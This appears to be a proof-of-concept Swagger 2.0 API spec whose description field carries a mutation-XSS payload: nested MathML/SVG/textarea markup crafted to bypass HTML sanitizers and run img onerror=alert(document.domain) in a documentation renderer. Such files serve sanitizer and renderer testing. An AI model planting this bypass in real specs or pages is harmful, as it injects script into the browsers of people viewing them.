swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=alert(document.domain)'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
basePath: /Test/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
